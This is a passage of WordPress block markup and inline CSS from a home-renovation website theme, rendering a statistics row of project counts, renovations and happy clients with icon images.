padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-310f3dbd-be56-4fc5-b52f-00b541d1d06c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\"} -->\n<style type=\"text/css\"> .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"960934cc-d8f0-4b4d-9d0a-764129efdfa3\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\"} -->\n<style type=\"text/css\"> .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"bd99dc76-0eae-4a02-b907-7f82fde09603\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"67d4b8a4-6740-44c1-8315-001228127f3b\"} -->\n<style type=\"text/css\"> .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67d4b8a4-6740-44c1-8315-001228127f3b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ddc2115b-19da-4fd1-9373-7d3945f2a62f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"87728901-354e-4436-8ea8-0b84a45f4e35\"} -->\n<style type=\"text/css\"> .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-87728901-354e-4436-8ea8-0b84a45f4e35\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 